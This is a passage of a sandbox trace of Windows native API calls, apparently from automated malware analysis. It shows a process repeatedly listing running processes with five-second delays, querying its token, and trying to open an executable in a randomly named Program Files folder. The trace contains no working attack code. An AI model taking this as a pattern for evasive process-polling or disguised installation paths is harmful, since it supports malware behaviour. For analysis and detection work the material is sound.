ResultLength=0x0) returned 0x0 [0161.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0161.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0161.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0161.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0161.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0161.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0161.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.015] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.111] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.150] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0162.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0162.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0162.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0162.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0162.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0162.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0162.190] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdea50 | out: TokenHandle=0xdea50*=0x17c) returned 0x0 [0162.190] NtQueryInformationToken (in: TokenHandle=0x17c, TokenInformationClass=0x14, TokenInformation=0xdea48, TokenInformationLength=0x4, ReturnLength=0xdea4c | out: TokenInformation=0xdea48, ReturnLength=0xdea4c) returned 0x0 [0162.190] NtClose (Handle=0x17c) returned 0x0 [0162.207] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.207] NtCreateFile (in: FileHandle=0xdea40, DesiredAccess=0x12019f, ObjectAttributes=0xdea08*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea28, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea40*=0x0, IoStatusBlock=0xdea28*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.210] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6765c0) returned 1 [0162.210] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea10, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.210] NtCreateFile (in: FileHandle=0xdea30, DesiredAccess=0x120089, ObjectAttributes=0xde9f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea18, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea30*=0x0, IoStatusBlock=0xdea18*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.211] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6765c0) returned 1 [0162.212] NtOpenProcessToken (in: 